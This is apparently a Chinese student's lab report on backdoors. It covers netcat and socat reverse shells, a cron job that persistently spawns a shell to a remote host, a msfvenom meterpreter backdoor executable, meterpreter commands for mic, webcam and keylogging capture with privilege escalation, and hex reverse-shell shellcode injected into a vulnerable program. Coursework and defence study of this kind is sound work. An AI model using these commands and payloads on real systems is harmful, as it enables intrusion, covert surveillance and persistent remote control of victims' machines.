《网络对抗技术》 Exp2 后门原理与实践
实验内容
-
1、使用netcat获取主机操作Shell,cron启动 (0.5分)
-
2、使用socat获取主机操作Shell, 任务计划启动 (0.5分)
-
3、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
-
4、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
-
5、可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。
基础问题回答
-
1、例举你能想到的一个后门进入到你系统中的可能方式?
答:正版软件故意或被攻击,包含后门;正版库文件中包含后门;安装包中包含后门,放到网上供下载;绑定到特定文件中,放到网上供下载;直接发送恶意程序;发送攻击性钓鱼链接,恶意网站种马;攻击系统漏洞,获取控制权后,安装后门。 -
2、例举你知道的后门如何启动起来(win及linux)的方式?
答:开机自启动技术;win的定时任务;linux的cron(linux下的定时执行工具);修改文件关联;修改后门程序名字、图标、扩展名,诱导用户点击。 -
3、Meterpreter有哪些给你映像深刻的功能?
答:可直接生成后门程序,生成后门程序,可以获取目标主机音频、摄像头、截图、击键操作(谍战片的既视感)。 -
4、如何发现自己有系统有没有被安装后门?
答:及时安装系统补丁,开启杀毒软件,杀毒软件的木马库版本及时更新,手动查看注册表和启动项,关注任务计划程序库。
常用工具学习
NC或netcat
是一个底层工具,进行基本的TCP、UDP数据收发。常被与其他工具结合使用,起到后门的作用。
netcat常用命令
natcat.exe -help
可以查看帮助文档
-4 Use IPv4 only
-6 Use IPv6 only
-C, --crlf Use CRLF for EOL sequence
-c, --sh-exec <command> Executes the given command via /bin/sh
-e, --exec <command> Executes the given command
--lua-exec <filename> Executes the given Lua script
-g hop1[,hop2,...] Loose source routing hop points (8 max)
-G <n> Loose source routing hop pointer (4, 8, 12, ...)
-m, --max-conns <n> Maximum <n> simultaneous connections
-h, --help Display this help screen
-d, --delay <time> Wait between read/writes
-o, --output <filename> Dump session data to a file
-x, --hex-dump <filename> Dump session data as hex to a file
-i, --idle-timeout <time> Idle read/write timeout
-p, --source-port port Specify source port to use
-s, --source addr Specify source address to use (doesn't affect -l)
-l, --listen Bind and listen for incoming connections
-k, --keep-open Accept multiple connections in listen mode
-n, --nodns Do not resolve hostnames via DNS
-t, --telnet Answer Telnet negotiations
-u, --udp Use UDP instead of default TCP
--sctp Use SCTP instead of default TCP
Win获得Linux Shell
-
1.Windows 打开监听
- 下载解压ncat.rar
- 进入ncat.exe所在文件夹,并执行
ncat.exe -l -p 端
- Linux反弹连接Windows
nc 192.168.248.1 1209 -e /bin/sh
(2)Linux获取Windows Shell
- Linux运行监听指令
nc -l -p 1209
- Windows反弹连接Linux
ncat.exe 192.168.248.128 1209 -e cmd.exe
- 运行结果如下:
- Linux运行监听指令
任务一进阶版:使用netcat、socat实现windows,linux之间的后门连接,任务计划启动
(1)Windows获取Linux Shell(使用netcat,cron启动)
- Windows运行监听指令
ncat.exe -l -p 1209
- Linux反弹连接,cron启动
15 * * * * /bin/netcat 192.168.248.1 1209 -e /bin/sh
- 运行结果如下:
(2)Linux获取Windows Shell(使用socat,计划任务启动)
- Linux运行监听指令
socat - tcp:192.168.248.1:1209
- Windows反弹连接,设置任务计划启动
- 运行结果如下:
需求分析
- 后门程序meterpreter
- 将后门程序放到目标机中
- 使目标机运行后门程序且不被恶意代码检测程序和防火墙发现
- 攻击者连接后门程序
- 远程执行各种指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.248.128 LPORT=1209 -f exe > meter_backdoor.exe
- 将生成的后门程序meter_backdoor.exe拷贝到受控方
- 在受控方Windows中使用
ncat.exe -lv 1209 > meter_backdoor.exe
查看连接状态 - 在主控方kali中输入
nc 192.168.248.1 1209 < meter_backdoor.exe
在Kali上使用msfconsole
指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端
获取目标主机shell 主机音频 主机摄像头 键盘输入 提权
shell record_mic webcam_snap keyscan_start keyscan_dump getsystem
选作
下载反弹连接的shellcode
重复实验一中的第三部分的准备工作
输入下面代码生成shellcode文件
perl -e 'print "A" x 32;print"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode
打开一个终端输入
(cat input_shellcode;cat) | ./20181209
,注入这段攻击
再打开个终端输入
ps -ef | grep 20181209
采用gdb调试
寻找到esp,修改指令
perl -e 'print "A" x 32;print"\xd0\x44\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input
运行的如下
打开msfconsole
使用(cat input;cat) | ./20181209将input输入
实验成功
实践总结与体会
- 实验过程中最大的触动还是在使用MSF的时候,非常轻易的就从Windows上获取到了许多信息,在实验成功的同时也越来越让我感觉到现在的电脑真的是不堪一击,当然很多时候还是由于我们缺乏一定的安全意识所导致的。比如说没有养成定时打补丁的习惯,又或者是在下载软件的时候没有去通过正规渠道,这些东西在平常看起来没有什么大问题,如果有一天你的电脑有了利用价值,那么黑客想要攻击你的电脑就会变得易如反掌。
- 提高电脑的安全性还是要从我们平常做起,比如说可以经常关闭一些本机不用的端口或只允许指定的端口访问,其次要使用专杀木马的软件,为了有效地防范木马后门,还要学会对进程进行操作,时时注意系统运行状况,看看是否有一些不明进程正运行并及时地将不明进程终止掉。